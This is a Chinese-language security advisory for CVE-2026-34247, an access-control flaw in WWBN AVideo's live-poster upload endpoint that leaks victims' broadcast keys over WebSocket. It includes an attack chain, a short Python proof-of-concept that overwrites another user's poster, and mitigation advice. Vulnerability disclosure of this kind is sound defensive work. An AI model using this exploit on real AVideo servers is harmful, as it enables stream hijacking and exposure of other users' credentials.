CVE-2026-34247 CVSS 5.4 中危

CVE-2026-34247 AVideo越权修改直播封面及信息泄露

披露日期: 2026-03-27

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-34247

漏洞类型

IDOR, 信息泄露

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

WWBN AVideo

漏洞概述

WWBN AVideo 26.0及以下版本存在访问控制缺陷。`plugin/Live/uploadPoster.php`接口仅验证登录状态，未校验用户权限。攻击者可利用此漏洞覆盖任意直播流的封面，并触发系统广播包含受害者广播密钥和用户ID的WebSocket通知，导致敏感信息泄露及潜在的直播流劫持风险。

技术细节

该漏洞源于不安全的直接对象引用（IDOR）。受影响端点`plugin/Live/uploadPoster.php`在处理上传请求时，仅依赖`User::isLogged()`确认用户身份，未验证当前用户是否有权操作目标`live_schedule_id`对应的直播计划。攻击者通过修改请求参数中的ID，即可强制覆盖他人的海报图片。漏洞利用的关键在于后续反应：系统在覆盖完成后，会通过WebSocket发送`socketLiveOFFCallback`回调，将目标流的`broadcast_key`和`user_id`广播至所有连接的客户端。由于广播密钥通常用于推流或验证，获取该密钥的攻击者可接管受害者的直播流。

攻击链分析

STEP 1

步骤1：获取凭证

攻击者在目标平台注册一个普通账号并登录，获取有效的会话Cookie。

STEP 2

步骤2：构造恶意请求

攻击者向`plugin/Live/uploadPoster.php`发送POST请求，在参数中指定受害者的`live_schedule_id`并上传任意图片。

STEP 3

步骤3：触发越权操作

服务器端仅检查登录状态，未验证所有权，执行覆盖操作，修改受害者的直播封面。

STEP 4

步骤4：监听信息泄露

服务器触发`socketLiveOFFCallback`事件，将包含受害者`broadcast_key`和`user_id`的消息广播给所有WebSocket客户端。

STEP 5

步骤5：接管直播流

攻击者解析WebSocket消息获取密钥，利用该密钥接管或干扰受害者的直播推流。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL
url = "https://example.com/plugin/Live/uploadPoster.php"

# Attacker's session cookie (must be logged in)
cookies = {
    "PHPSESSID": "valid_attacker_session_id"
}

# Victim's live_schedule_id to target
victim_schedule_id = "1234"

# Data payload with arbitrary schedule ID
payload = {
    "live_schedule_id": victim_schedule_id
}

# File to upload as poster
files = {
    'poster': ('malicious.jpg', open('malicious.jpg', 'rb'), 'image/jpeg')
}

# Send the request
response = requests.post(url, cookies=cookies, data=payload, files=files)

if response.status_code == 200:
    print("[+] Poster overwritten. Monitor WebSocket for socketLiveOFFCallback to capture broadcast_key.")
else:
    print("[-] Request failed.")

影响范围

WWBN AVideo <= 26.0

防御指南

临时缓解措施

建议立即升级至修复版本。若无法立即升级，应通过WAF或网络访问控制列表（ACL）限制对`/plugin/Live/uploadPoster.php`路径的访问，仅允许管理员或特定IP调用，并监控WebSocket流量中是否包含敏感凭据广播。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表